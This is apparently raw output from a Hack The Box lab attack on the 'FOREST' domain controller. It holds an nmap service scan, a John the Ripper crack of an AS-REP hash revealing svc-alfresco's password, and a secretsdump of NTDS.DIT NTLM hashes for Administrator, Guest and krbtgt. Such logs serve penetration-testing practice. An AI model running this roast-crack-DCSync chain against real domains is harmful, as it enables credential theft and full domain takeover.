PORT      STATE SERVICE      REASON          VERSION
53/tcp    open  domain       syn-ack ttl 127 Simple DNS Plus
88/tcp    open  kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-12-22 01:54:53Z)
135/tcp   open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap         syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?    syn-ack ttl 127
593/tcp   open  ncacn_http   syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped   syn-ack ttl 127
3268/tcp  open  ldap         syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped   syn-ack ttl 127
5985/tcp  open  http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf       syn-ack ttl 127 .NET Message Framing
47001/tcp open  http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49676/tcp open  ncacn_http   syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49684/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49703/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49928/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
|   date: 2024-12-22T01:55:49
|_  start_date: 2024-12-22T01:47:26
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2024-12-21T17:55:45-08:00
|_clock-skew: mean: 2h46m51s, deviation: 4h37m08s, median: 6m50s
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 32753/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 41142/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 44587/udp): CLEAN (Timeout)
|   Check 4 (port 41891/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice          ($krb5asrep$23$svc-alfresco@HTB.LOCAL)
1g 0:00:00:02 DONE (2024-12-21 21:05) 0.4444g/s 1815Kp/s 1815Kc/s 1815KC/s s428237..s3r2s1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
.........